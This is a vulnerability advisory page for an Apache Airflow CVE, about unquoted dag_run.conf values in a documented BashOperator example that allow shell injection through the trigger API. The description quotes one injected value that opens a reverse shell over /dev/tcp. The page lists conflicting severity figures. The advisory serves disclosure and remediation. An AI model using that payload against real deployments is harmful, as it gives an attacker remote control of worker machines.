PT-2026-45368 · Apache+4 · Apache Airflow+1

·

CVE-2026-42252

·

Published

2026-06-01

·

Updated

2026-06-05

CVSS v3.1

9.1

Critical

VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
CVE-2026-42252 - Apache Airflow: BashOperator Jinja2 injection via dag run.conf — low-privilege user pattern
CVE ID :CVE-2026-42252 Published : June 1, 2026, 9:16 a.m. | 1 hour, 31 minutes ago Description :Apache Airflow's official documentation at core-concepts/dag-run.html ("Passing Parameters when triggering Dags") showed a verbatim BashOperator(bash command="echo value: {{ dag run.conf['conf1'] }}") example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had Dag.can trigger permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the conf field of the trigger API: an authenticated trigger user could supply "; bash -i >& /dev/tcp/.../9999 0>&1; #" as a conf value and reach an os.exec on the worker. This CVE covers the documentation correction in apache/airflow PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to apache-airflow 3.2.2 or later to pick up the corrected documentation shipped with the release. Severity: 0.0 | NA Visit the link for more details, such as CVSS details, affected products, timeline, and more...

Exploit

Fix

Found an issue in the description? Have something to add? Feel free to write us 👾

Weakness Enumeration

Related Identifiers

BIT-AIRFLOW-2026-42252
CVE-2026-42252
ECHO-E5BF-6322-947E
GHSA-C85C-G9WV-PPH2
PYSEC-2026-184

Affected Products

Apache Airflow
Airflow